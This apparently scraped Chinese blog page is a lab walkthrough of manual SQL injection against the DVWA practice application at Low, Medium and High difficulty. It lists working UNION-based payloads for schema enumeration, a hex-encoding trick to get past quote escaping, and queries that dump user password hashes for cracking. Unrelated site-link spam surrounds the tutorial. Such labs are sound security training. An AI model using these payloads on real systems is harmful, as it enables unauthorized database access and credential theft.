当前位置: 首页 > wzjs >正文

云服务器做网站详细小程序推广任务

云服务器做网站详细,小程序推广任务,免费咨询法律律师电话号码,小程序定制手工SQL注入攻击的标准思路 Low等级 (1)判断是否存在注入 (2)猜解字段个数 (3)确定字段顺序 (4)获取当前数据库 (5)获取当前数据库中的表 &#xff08…

手工SQL注入攻击的标准思路

Low等级

(1)判断是否存在注入

(2)猜解字段个数

(3)确定字段顺序

(4)获取当前数据库

(5)获取当前数据库中的表

(6)获取数据表中的字段名

(7)获取数据

Medium等级

(1)判断是否存在注入

(2)猜解字段个数

(3)确定字段顺序

(4)获取当前数据库

(5)获取当前数据库中的表

(6)获取数据表中的字段名

(7)获取数据

High等级

(1)通过LIMIT限制

(2)爆库名和版本号

(3)爆数据库名

(4)爆字段名

(5)盗取用户密码

手工SQL注入攻击的标准思路

1.判断是否存在注⼊,注⼊的类型是字符型、数字型 还是 搜索型 2.猜解SQL查询语句中的字段数 3.确定显⽰的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.查询/下载数据

Low等级

在Low等级,SQL注入的界面如下当我们正常输入UserID(比如:1~5)然后点击Submit按钮之后会正常显示User的ID、FirstName和Surname三个字段

IDFirst nameSurname
1adminadmin
2GordonBrown
3HackMe
4PabloPicasso
5BobSmith

(1)判断是否存在注入

注入的类型是字符型、数字型还是搜索型

输入1,查询成功

1' or '1'='1 #

查询成功

1' and '1'='1

查询成功

1' and '1'='2 #

查询失败,返回结果为空

由此可见,此模块存在于字符型注入漏洞。

(2)猜解字段个数

1′ order by 1 #

查询成功

1′ order by 2 #

查询成功

1′ order by 3 #

查询失败

由此可见,说明此模块执行的SQL查询语句中只有两个字段,即这里的First Name, Surname。

(3)确定字段顺序

1' union select 1,2 #

查询成功

由此可见,说明此模块执行的SQL查询语句大概为

SELECT FirstName, SurName FROM TableName WHERE ID = 'id' ....

(4)获取当前数据库

1' union select 1,database() #

查询成功

说明当前数据库名为dvwa

(5)获取当前数据库中的表

1' union select 1, table_name from information_schema.tables where table_schema='dvwa

dvwa这个数据库下有两张表:guestbook 和 users

如果表很多的话,也可以使用group_concat函数来一并返回表名:

1' union select 1, group_concat(table_name) from information_schema.tables where
table_schema='dvwa

(6)获取数据表中的字段名

1' union select 1,group_concat(column_name) from information_schema.columns where
table_name='users

(7)获取数据

1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

接将admin的password复制出来,拿到一个MD5在线解密的网站破解一下

Medium等级

使用Burp Suite来做抓包

把其中的参数id=1改为3,再点击Forware按钮,它就会将我们原本选择UserID=1改为UserID=3转 发到真实服务器,于是后端返回了如下的结果:

(1)判断是否存在注入

注入的类型是字符型、数字型还是搜索型

抓包更改参数

id=1′ or 1=1 #

报错

将其改为

id=1 or 1=1 #

由此可见,存在数字型注入

(2)猜解字段个数

抓包更改参数

id=1 order by 1 #

输入

1 order by 2 #

输入

1 order by 3 #

查询失败,说明存在返回2个字段。

(3)确定字段顺序

抓包更改参数

id=1 union select 1,2 #

(4)获取当前数据库

抓包更改参数

id=1 union select 1,database() #

说明当前数据库为dvwa

(5)获取当前数据库中的表

抓包修改参数

id=1 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database() #

dvwa这个数据库下有两张表:guestbook 和 users

(6)获取数据表中的字段名

抓 包 修 改 参 数

 id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

报错,单引号被转义了,变成了'

利 用 16 进 制 进 行 绕 过 转 义 操 作 , 再 次 抓 包 修 改 参 数 为 :

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

(7)获取数据

抓 包 后 修 改 参 数

id=1 union select group_concat(user_id,first_name,last_name), group_concat(password) from users #

High等级

(1)通过LIMIT限制

1' union select 1,2#

(2)爆库名和版本号

-1' union select database(),version() #

(3)爆数据库名

1' union select (select group_concat(table_name) from information_schema.tables where table_schema='dvwa'),2#

(4)爆字段名

 -1' union select (select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),2#

(5)盗取用户密码

-1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

http://www.dtcms.com/wzjs/813248.html

相关文章:

  • 做网站 所需资源威联通 wordpress
  • 长治网站制作东营会计信息网官网
  • 哪个网站做物业贷网站建设多钱
  • wordpress建网站详细教程对网站的建议
  • 开发移动网站家装设计软件app免费
  • 网站建设商务代表工作总结沈阳妇幼保健院人流价格表
  • 微网站建设比较全面的是网站备案的要求是什么样的
  • 练手网站开发无忧网
  • 贸易公司做网站怎么样素材下载免费
  • 网站建设代理公司做公司标志用哪个网站
  • 贵阳网站设计做资源网站需要什么
  • 接做网站的郴州市网站建设公司
  • 做网站需要注意哪些东西设计素材网站排行榜
  • 如何把刚做的网站被百度抓取到上海专业网站设计制作
  • 网站备案号 如何添加WordPress页面模板怎么选
  • 做网站后台指的那现在较为常用的网站开发技术
  • 有没有做淘宝客网站的无锡网站建设君通科技公司
  • 数据百度做网站好用吗wordpress的插件下载
  • 网站开发公司杭州网站建设怎样做电商卖货
  • 保定哪家做网站专业怎么样购买服务器建设网站
  • 网站建设设计风格描述登录网站定制
  • 自己做网站要学什么关键词挖掘工具免费
  • 乐清市做淘宝网站公司网站建设第一步怎么弄
  • 大兴做网站企业网站 管理
  • 网站开发实例模板代码错误网站
  • 哪些网站的做的好看wordpress5.0编辑器
  • 那里有专门做印刷品的网站做网站公司东莞
  • 网站建设业务培训国内新闻最新消息十条摘抄2023
  • 网站建设中的接口wordpress仿异次元
  • 360搜索网站提交如何搭建app开发平台